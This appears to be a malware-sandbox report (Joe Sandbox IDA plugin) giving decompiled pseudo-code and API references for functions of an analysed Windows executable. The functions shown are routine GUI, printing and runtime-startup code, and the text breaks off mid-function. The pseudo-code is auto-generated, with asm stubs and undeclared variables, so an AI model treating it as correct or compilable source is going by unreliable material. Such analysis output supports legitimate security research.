                                            • Opcode ID: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
                                            • Instruction ID: 1037135d2ca6d5ab5d4448aeed59ef973abf2fe16e9a43a6574f43dcbb056aca
                                            • Opcode Fuzzy Hash: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
                                            • Instruction Fuzzy Hash: D1E0D832701210FB82215719AC0895FBB52DBD4736BA98567F529C1290C7B9489286AE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0041A275(signed int __ecx) {
                                            				_Unknown_base(*)()* _t3;
                                            				signed int _t7;
                                            				signed int _t8;
                                            
                                            				_t7 = __ecx;
                                            				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                                            				if(_t3 == 0) {
                                            					_t8 = _t7 | 0xffffffff;
                                            					SetLastError(0x78);
                                            				} else {
                                            					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                                            				}
                                            				return _t8;
                                            			}







                                            APIs
                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
                                            • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289
                                            • SetLastError.KERNEL32(00000078), ref: 0041A2A1
                                            Strings
                                            Similarity
                                            • API ID: AddressErrorHandleLastModuleProc
                                            • String ID: GDI32.DLL$GetLayout
                                            • API String ID: 4275029093-2396518106
                                            • Opcode ID: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
                                            • Instruction ID: 1954eb6f5355677032b0495d8726e370a05d23e30929425976ce774bf1de63f4
                                            • Opcode Fuzzy Hash: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
                                            • Instruction Fuzzy Hash: 38D05B31B42330EFC66027A4BD0D69A7B54DB08B6579502B7782ED22D0CBF85C4187ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 35%
                                            			E0041F691(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				char _v20;
                                            				intOrPtr _v24;
                                            				long _v28;
                                            				struct tagRECT _v44;
                                            				struct tagRECT _v60;
                                            				intOrPtr _t150;
                                            				intOrPtr* _t155;
                                            				intOrPtr _t161;
                                            				void* _t162;
                                            				signed int _t165;
                                            				signed int _t167;
                                            				signed int _t171;
                                            				signed int _t173;
                                            				long _t191;
                                            				intOrPtr* _t198;
                                            				intOrPtr* _t200;
                                            				long _t202;
                                            				intOrPtr* _t209;
                                            				intOrPtr* _t211;
                                            				intOrPtr* _t214;
                                            				long _t216;
                                            				void* _t219;
                                            				signed char _t222;
                                            				intOrPtr _t225;
                                            				intOrPtr _t236;
                                            				intOrPtr _t242;
                                            				char* _t248;
                                            				struct tagRECT* _t263;
                                            				intOrPtr* _t279;
                                            				signed int _t281;
                                            				long _t283;
                                            				void* _t287;
                                            				intOrPtr _t291;
                                            				intOrPtr _t308;
                                            
                                            				_t219 = __ecx;
                                            				 *((intOrPtr*)(__ecx + 0x88)) = 1;
                                            				E0041FF70(__ecx);
                                            				_t279 = __ecx + 0x84;
                                            				if((E0041A275( *((intOrPtr*)(__ecx + 0x84))) & 0x00000001) != 0) {
                                            					E0041A2AB( *_t279, 0);
                                            				}
                                            				_t150 =  *((intOrPtr*)(_t219 + 0x68));
                                            				_t222 =  *(_t150 + 0x64);
                                            				if((_t222 & 0x00000004) == 0) {
                                            					if((_t222 & 0x00000002) == 0) {
                                            						GetWindowRect( *(_t150 + 0x1c),  &_v44);
                                            						_t281 =  *(_t219 + 0x78) & 0x0000a000;
                                            						 *((intOrPtr*)(_t219 + 4)) = _a4;
                                            						asm("sbb edx, edx");
                                            						 *((intOrPtr*)(_t219 + 8)) = _a8;
                                            						_t248 =  &_v20;
                                            						_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))(_t248, 0xffffffff, ( ~_t281 & 0x00000006) + 0xa);
                                            						_t225 =  *_t155;
                                            						_v8 =  *((intOrPtr*)(_t155 + 4));
                                            						if(_t281 == 0) {
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							_t283 = _v44.left;
                                            							asm("cdq");
                                            							_v20 = _t225 + _t283;
                                            							_v28 = _t283;
                                            							_t250 = _v44.right - _t283 - _t248 >> 1;
                                            							_t161 = _a8 - (_v44.right - _t283 - _t248 >> 1);
                                            							_v24 = _t161;
                                            							_v16 = _v8 + _t161;
                                            						} else {
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							_t291 = _v44.top;
                                            							_v24 = _t291;
                                            							asm("cdq");
                                            							_t250 = _v44.bottom - _t291 - _t248 >> 1;
                                            							_t191 = _a4 - (_v44.bottom - _t291 - _t248 >> 1);
                                            							_v28 = _t191;
                                            							_v20 = _t225 + _t191;
                                            							_v16 = _v8 + _t291;
                                            						}
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t162 = _t219 + 0x48;
                                            						_push(0);
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t287 = 0xc40000;
                                            						_push(0xc40000);
                                            					} else {
                                            						GetWindowRect( *(_t150 + 0x1c),  &_v60);
                                            						 *((intOrPtr*)(_t219 + 4)) = _a4;
                                            						 *((intOrPtr*)(_t219 + 8)) = _a8;
                                            						_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0xa);
                                            						_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0x10);
                                            						_t236 = _v60.top;
                                            						_v44.top = _t236;
                                            						_v44.bottom =  *((intOrPtr*)(_t198 + 4)) + _t236;
                                            						_v16 =  *((intOrPtr*)(_t200 + 4));
                                            						_t202 = _v60.left;
                                            						_v44.right =  *_t198 + _t202;
                                            						_v44.left = _t202;
                                            						_t250 =  *_t200 + _t202;
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_v44.left = _t202;
                                            						_v44.right =  *_t200 + _t202;
                                            						_v44.top = _t236;
                                            						_v44.bottom = _v16 + _t236;
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						goto L6;
                                            					}
                                            				} else {
                                            					GetWindowRect( *(_t150 + 0x1c),  &_v60);
                                            					 *((intOrPtr*)(_t219 + 4)) = _a4;
                                            					 *((intOrPtr*)(_t219 + 8)) = _a8;
                                            					_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0xa);
                                            					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0x10);
                                            					_v12 =  *_t211;
                                            					_v8 =  *((intOrPtr*)(_t211 + 4));
                                            					_t214 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 6);
                                            					_t242 = _v60.top;
                                            					_v44.top = _t242;
                                            					_v44.bottom =  *((intOrPtr*)(_t209 + 4)) + _t242;
                                            					_v16 =  *((intOrPtr*)(_t214 + 4));
                                            					_t216 = _v60.left;
                                            					_v44.right =  *_t209 + _t216;
                                            					_v44.left = _t216;
                                            					_t250 =  *_t214 + _t216;
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_v44.left = _t216;
                                            					_v44.right = _v12 + _t216;
                                            					_v44.top = _t242;
                                            					_v44.bottom = _v8 + _t242;
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_t308 = _v16 + _t242;
                                            					_v44.left = _t216;
                                            					_v8 = _t308;
                                            					_v44.bottom = _t308;
                                            					_v44.right = _t250;
                                            					_v44.top = _t242;
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_v44.left = _t216;
                                            					_v44.right = _t250;
                                            					_v44.top = _t242;
                                            					_v44.bottom = _v8;
                                            					L6:
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_t287 = 0xc40000;
                                            					_push(0);
                                            					_push(0xc40000);
                                            					_t162 = _t219 + 0x48;
                                            				}
                                            				_push(_t162);
                                            				E004239AC();
                                            				_push(0);
                                            				_t263 = _t219 + 0x58;
                                            				_push(_t287);
                                            				_push(_t263);
                                            				E004239AC();
                                            				_t165 =  *0x439bf4; // 0x2
                                            				_t167 =  *0x439bf0; // 0x2
                                            				InflateRect(_t219 + 0x48,  ~_t167,  ~_t165);
                                            				_t171 =  *0x439bf4; // 0x2
                                            				_t173 =  *0x439bf0; // 0x2
                                            				InflateRect(_t263,  ~_t173,  ~_t171);
                                            				_t264 = _a8;
                                            				_t289 = _a4;
                                            				E0041F5D0(_t219 + 0x28, _a4, _a8);
                                            				E0041F5D0(_t219 + 0x38, _a4, _a8);
                                            				E0041F5D0(_t219 + 0x48, _t289, _t264);
                                            				E0041F5D0(_t219 + 0x58, _t289, _t264);
                                            				 *((intOrPtr*)(_t219 + 0x74)) = E004201E2();
                                            				E0041F9E4(_t219, _t289, _t264);
                                            				return E00420341(_t219, _t250);
                                            			}

                                            APIs
                                              • Part of subcall function 0041FF70: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
                                              • Part of subcall function 0041FF70: GetMessageA.USER32 ref: 0041FF9B
                                              • Part of subcall function 0041FF70: DispatchMessageA.USER32 ref: 0041FFAE
                                              • Part of subcall function 0041FF70: SetRectEmpty.USER32(?), ref: 0041FFD7
                                              • Part of subcall function 0041FF70: GetDesktopWindow.USER32 ref: 0041FFEF
                                              • Part of subcall function 0041FF70: LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
                                              • Part of subcall function 0041FF70: GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017
                                              • Part of subcall function 0041A275: GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
                                              • Part of subcall function 0041A275: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289
                                            • GetWindowRect.USER32 ref: 0041F6DF
                                              • Part of subcall function 0041A2AB: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
                                              • Part of subcall function 0041A2AB: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2
                                            • GetWindowRect.USER32 ref: 0041F7CC
                                              • Part of subcall function 0041F5D0: OffsetRect.USER32(?,?,?), ref: 0041F607
                                              • Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA0D
                                              • Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA17
                                              • Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA21
                                              • Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA2B
                                              • Part of subcall function 00420341: GetCapture.USER32 ref: 00420352
                                              • Part of subcall function 00420341: SetCapture.USER32(?), ref: 00420362
                                              • Part of subcall function 00420341: GetCapture.USER32 ref: 0042036E
                                              • Part of subcall function 00420341: GetMessageA.USER32 ref: 00420388
                                              • Part of subcall function 00420341: DispatchMessageA.USER32 ref: 004203BA
                                              • Part of subcall function 00420341: GetCapture.USER32 ref: 00420418
                                            • GetWindowRect.USER32 ref: 0041F879
                                            • InflateRect.USER32(?,00000002,00000002), ref: 0041F97C
                                            • InflateRect.USER32(?,00000002,00000002), ref: 0041F98F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
                                            • String ID:
                                            • API String ID: 2041477333-0
                                            • Opcode ID: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
                                            • Instruction ID: 42ddb03621f51a7623203be26b69d0316b25f3a5275469d587ef5c4032a932e9
                                            • Opcode Fuzzy Hash: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
                                            • Instruction Fuzzy Hash: 55D13671A006199FCF04CF98C880ADEBBB6EF49310F1581AAED05BB255D7B1AA45CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E004041B5(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, signed int _a36, signed int _a40) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _t131;
                                            				signed int _t230;
                                            				void* _t267;
                                            
                                            				if(_a40 < 4) {
                                            					_a40 = 4;
                                            				}
                                            				asm("cdq");
                                            				_v8 = _a28 / _a40 + 1;
                                            				_t131 = _a32;
                                            				asm("cdq");
                                            				_t230 = _t131 % _a40;
                                            				_v12 = _t131 / _a40 + 1;
                                            				_v16 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v16 >= _v12 - _t230 >> 1) {
                                            						break;
                                            					}
                                            					_v20 = 0;
                                            					while(_v20 < _v8 - _v16) {
                                            						BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v16 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v16 * _a40, 0xcc0020);
                                            						_t230 = _a36;
                                            						E0040381D(_t230);
                                            						_t267 = _t267 + 4;
                                            						_v20 = _v20 + 1;
                                            					}
                                            					_v20 = 0;
                                            					while(_v20 < _v12 - _v16) {
                                            						BitBlt(_a16, _a20 + _a28 - (_v16 + 1) * _a40, _a24 + _v20 * _a40, _a40, _a40, _a4, _a8 + _a28 - (_v16 + 1) * _a40, _a12 + _v20 * _a40, 0xcc0020);
                                            						_t230 = _a36;
                                            						E0040381D(_t230);
                                            						_t267 = _t267 + 4;
                                            						_v20 = _v20 + 1;
                                            					}
                                            					_v20 = _v8 - _v16;
                                            					while(_v20 >= 0) {
                                            						BitBlt(_a16, _a20 + (_v20 - 1) * _a40, _a24 + _a32 - (_v16 + 1) * _a40, _a40, _a40, _a4, _a8 + (_v20 - 1) * _a40, _a12 + _a32 - (_v16 + 1) * _a40, 0xcc0020);
                                            						_t230 = _a36;
                                            						E0040381D(_t230);
                                            						_t267 = _t267 + 4;
                                            						_v20 = _v20 - 1;
                                            					}
                                            					_v20 = _v12 - _v16;
                                            					while(_v20 >= 0) {
                                            						BitBlt(_a16, _a20 + _v16 * _a40, _a24 + (_v20 - 1) * _a40, _a40, _a40, _a4, _a8 + _v16 * _a40, _a12 + (_v20 - 1) * _a40, 0xcc0020);
                                            						_t230 = _a36;
                                            						E0040381D(_t230);
                                            						_t267 = _t267 + 4;
                                            						_v20 = _v20 - 1;
                                            					}
                                            					_v16 = _v16 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				return 1;
                                            			}











                                            APIs
                                            • BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 00404260
                                            • BitBlt.GDI32(?,?,?,00000004,00000004,?,?,00000000,00CC0020), ref: 004042E6
                                            • BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,?,00CC0020), ref: 0040436F
                                            • BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 004043EC
                                            • BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404433
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
                                            • Instruction ID: 29e2845c1fd78097f43836e8b5be001507bced236b49523afccdde5b5024b9e6
                                            • Opcode Fuzzy Hash: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
                                            • Instruction Fuzzy Hash: 1EA197B1A001099FCB08CFACC995AEEB7B9FF88308F158659F919A7244D734E915CF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E0042669F(void* __ecx) {
                                            				intOrPtr _t67;
                                            				void* _t69;
                                            				void* _t72;
                                            				CHAR** _t77;
                                            				intOrPtr _t90;
                                            				signed int _t112;
                                            				void* _t117;
                                            				void* _t129;
                                            				intOrPtr* _t132;
                                            				signed short* _t134;
                                            				intOrPtr* _t135;
                                            				intOrPtr* _t136;
                                            				void* _t137;
                                            
                                            				E00406520(E00429D12, _t137);
                                            				_t129 = __ecx;
                                            				if( *((intOrPtr*)(_t137 + 8)) != 0) {
                                            					L20:
                                            					_push(0);
                                            					_push(0x14000c);
                                            					_push(1);
                                            					E0041009E(_t137 - 0x160);
                                            					 *(_t137 - 4) = 2;
                                            					E0041030E(_t137 - 0x160);
                                            					_t65 =  *((intOrPtr*)(_t129 + 0x94));
                                            					if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
                                            						E0041A92B(_t65);
                                            					}
                                            					_t66 =  *((intOrPtr*)(_t129 + 0x98));
                                            					_t132 = _t129 + 0x98;
                                            					if( *((intOrPtr*)(_t129 + 0x98)) != 0) {
                                            						E0041A92B(_t66);
                                            					}
                                            					_t67 =  *((intOrPtr*)(_t137 - 0x104));
                                            					 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
                                            					 *((intOrPtr*)(_t129 + 0x94)) =  *((intOrPtr*)(_t67 + 8));
                                            					 *_t132 =  *((intOrPtr*)(_t67 + 0xc));
                                            					_t117 = _t137 - 0x160;
                                            					L25:
                                            					_t69 = E00411D13(_t117);
                                            					L26:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t137 - 0xc));
                                            					return _t69;
                                            				}
                                            				_t72 =  *(__ecx + 0x98);
                                            				if(_t72 == 0) {
                                            					goto L20;
                                            				}
                                            				_t69 = GlobalLock(_t72);
                                            				_t134 = _t69;
                                            				if((_t134[3] & 0x00000001) == 0) {
                                            					goto L26;
                                            				}
                                            				_push(0);
                                            				_push(0x14000c);
                                            				_push(1);
                                            				E0041009E(_t137 - 0xbc);
                                            				 *(_t137 - 4) = 0;
                                            				E0041030E(_t137 - 0xbc);
                                            				if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
                                            					_t77 = E00410255(_t137 - 0xbc, _t137 - 0x10);
                                            					 *(_t137 - 4) = 1;
                                            					if(lstrcmpA(_t134 + ( *_t134 & 0x0000ffff),  *_t77) != 0) {
                                            						L10:
                                            						_t112 = 1;
                                            						L11:
                                            						 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
                                            						E00416AEC(_t137 - 0x10);
                                            						if(_t112 == 0) {
                                            							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8));
                                            							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8)) != 0) {
                                            								E0041A92B(_t83);
                                            							}
                                            							_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc));
                                            							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
                                            								E0041A92B(_t85);
                                            							}
                                            						} else {
                                            							_t88 =  *((intOrPtr*)(_t129 + 0x94));
                                            							_t135 = _t129 + 0x94;
                                            							if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
                                            								E0041A92B(_t88);
                                            							}
                                            							E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
                                            							_t90 =  *((intOrPtr*)(_t137 - 0x60));
                                            							 *_t135 =  *((intOrPtr*)(_t90 + 8));
                                            							 *((intOrPtr*)(_t129 + 0x98)) =  *((intOrPtr*)(_t90 + 0xc));
                                            						}
                                            						L19:
                                            						 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
                                            						_t117 = _t137 - 0xbc;
                                            						goto L25;
                                            					}
                                            					 *((char*)(_t137 + 0xb)) = lstrcmpA(_t134 + (_t134[1] & 0x0000ffff),  *(E00410292(_t137 - 0xbc, _t137 - 0x14))) != 0;
                                            					E00416AEC(_t137 - 0x14);
                                            					if( *((char*)(_t137 + 0xb)) != 0) {
                                            						goto L10;
                                            					}
                                            					_t112 = lstrcmpA & 0xffffff00 | lstrcmpA(_t134 + (_t134[2] & 0x0000ffff),  *(E004102D0(_t137 - 0xbc, _t137 - 0x18))) != 0x00000000;
                                            					E00416AEC(_t137 - 0x18);
                                            					if(_t112 == 0) {
                                            						goto L11;
                                            					}
                                            					goto L10;
                                            				}
                                            				_t105 =  *((intOrPtr*)(_t129 + 0x94));
                                            				_t136 = _t129 + 0x94;
                                            				if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
                                            					E0041A92B(_t105);
                                            				}
                                            				E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
                                            				 *_t136 = 0;
                                            				 *((intOrPtr*)(_t129 + 0x98)) = 0;
                                            				goto L19;
                                            			}

















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 004266A4
                                            • lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00426758
                                            • lstrcmpA.KERNEL32(?,00000000,?), ref: 00426776
                                            • lstrcmpA.KERNEL32(?,00000000,?,?), ref: 004267A4
                                              • Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
                                              • Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
                                              • Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957
                                            • GlobalLock.KERNEL32 ref: 004266CE
                                              • Part of subcall function 0041009E: __EH_prolog.LIBCMT ref: 004100A3
                                              • Part of subcall function 0041030E: PrintDlgA.COMDLG32(?,0042684E,00000001,0014000C,00000000,?,?,00000000), ref: 00410318
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Global$lstrcmp$H_prolog$FlagsFreeLockPrintUnlock
                                            • String ID:
                                            • API String ID: 2564375162-0
                                            • Opcode ID: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
                                            • Instruction ID: dab6b3ac01e2e209cde5cdaaba7fbabb505c74ae40abd7d4cd101a1c9b428fb9
                                            • Opcode Fuzzy Hash: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
                                            • Instruction Fuzzy Hash: E851A070B002269BCB14EF75D885FDAB7B8BF01308F41446EE559A3292DB38ED94CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 99%
                                            			E0040963B() {
                                            				void** _v8;
                                            				struct _STARTUPINFOA _v76;
                                            				signed int* _t48;
                                            				signed int _t50;
                                            				long _t55;
                                            				signed int _t57;
                                            				signed int _t58;
                                            				int _t59;
                                            				signed char _t63;
                                            				signed int _t65;
                                            				void** _t67;
                                            				int _t68;
                                            				int _t69;
                                            				signed int* _t70;
                                            				int _t72;
                                            				intOrPtr* _t73;
                                            				signed int* _t75;
                                            				void* _t76;
                                            				void* _t84;
                                            				void* _t87;
                                            				int _t88;
                                            				signed int* _t89;
                                            				void** _t90;
                                            				signed int _t91;
                                            				int* _t92;
                                            
                                            				_t89 = E00405667(0x480);
                                            				if(_t89 == 0) {
                                            					E00406490(0x1b);
                                            				}
                                            				 *0x43b520 = _t89;
                                            				 *0x43b620 = 0x20;
                                            				_t1 =  &(_t89[0x120]); // 0x480
                                            				_t48 = _t1;
                                            				while(_t89 < _t48) {
                                            					_t89[1] = _t89[1] & 0x00000000;
                                            					 *_t89 =  *_t89 | 0xffffffff;
                                            					_t89[2] = _t89[2] & 0x00000000;
                                            					_t89[1] = 0xa;
                                            					_t70 =  *0x43b520; // 0x22948c0
                                            					_t89 =  &(_t89[9]);
                                            					_t48 =  &(_t70[0x120]);
                                            				}
                                            				GetStartupInfoA( &_v76);
                                            				__eflags = _v76.cbReserved2;
                                            				if(_v76.cbReserved2 == 0) {
                                            					L25:
                                            					_t72 = 0;
                                            					__eflags = 0;
                                            					do {
                                            						_t75 =  *0x43b520; // 0x22948c0
                                            						_t50 = _t72 + _t72 * 8;
                                            						__eflags = _t75[_t50] - 0xffffffff;
                                            						_t90 =  &(_t75[_t50]);
                                            						if(_t75[_t50] != 0xffffffff) {
                                            							_t45 =  &(_t90[1]);
                                            							 *_t45 = _t90[1] | 0x00000080;
                                            							__eflags =  *_t45;
                                            							goto L37;
                                            						}
                                            						__eflags = _t72;
                                            						_t90[1] = 0x81;
                                            						if(_t72 != 0) {
                                            							asm("sbb eax, eax");
                                            							_t55 =  ~(_t72 - 1) + 0xfffffff5;
                                            							__eflags = _t55;
                                            						} else {
                                            							_t55 = 0xfffffff6;
                                            						}
                                            						_t87 = GetStdHandle(_t55);
                                            						__eflags = _t87 - 0xffffffff;
                                            						if(_t87 == 0xffffffff) {
                                            							L33:
                                            							_t90[1] = _t90[1] | 0x00000040;
                                            						} else {
                                            							_t57 = GetFileType(_t87);
                                            							__eflags = _t57;
                                            							if(_t57 == 0) {
                                            								goto L33;
                                            							}
                                            							_t58 = _t57 & 0x000000ff;
                                            							 *_t90 = _t87;
                                            							__eflags = _t58 - 2;
                                            							if(_t58 != 2) {
                                            								__eflags = _t58 - 3;
                                            								if(_t58 == 3) {
                                            									_t90[1] = _t90[1] | 0x00000008;
                                            								}
                                            								goto L37;
                                            							}
                                            							goto L33;
                                            						}
                                            						L37:
                                            						_t72 = _t72 + 1;
                                            						__eflags = _t72 - 3;
                                            					} while (_t72 < 3);
                                            					return SetHandleCount( *0x43b620);
                                            				}
                                            				_t59 = _v76.lpReserved2;
                                            				__eflags = _t59;
                                            				if(_t59 == 0) {
                                            					goto L25;
                                            				}
                                            				_t88 =  *_t59;
                                            				_t73 = _t59 + 4;
                                            				_v8 = _t73 + _t88;
                                            				__eflags = _t88 - 0x800;
                                            				if(_t88 >= 0x800) {
                                            					_t88 = 0x800;
                                            				}
                                            				__eflags =  *0x43b620 - _t88; // 0x20
                                            				if(__eflags >= 0) {
                                            					L18:
                                            					_t91 = 0;
                                            					__eflags = _t88;
                                            					if(_t88 <= 0) {
                                            						goto L25;
                                            					} else {
                                            						goto L19;
                                            					}
                                            					do {
                                            						L19:
                                            						_t76 =  *_v8;
                                            						__eflags = _t76 - 0xffffffff;
                                            						if(_t76 == 0xffffffff) {
                                            							goto L24;
                                            						}
                                            						_t63 =  *_t73;
                                            						__eflags = _t63 & 0x00000001;
                                            						if((_t63 & 0x00000001) == 0) {
                                            							goto L24;
                                            						}
                                            						__eflags = _t63 & 0x00000008;
                                            						if((_t63 & 0x00000008) != 0) {
                                            							L23:
                                            							_t65 = _t91 & 0x0000001f;
                                            							__eflags = _t65;
                                            							_t67 =  &(0x43b520[_t91 >> 5][_t65 + _t65 * 8]);
                                            							 *_t67 =  *_v8;
                                            							_t67[1] =  *_t73;
                                            							goto L24;
                                            						}
                                            						_t68 = GetFileType(_t76);
                                            						__eflags = _t68;
                                            						if(_t68 == 0) {
                                            							goto L24;
                                            						}
                                            						goto L23;
                                            						L24:
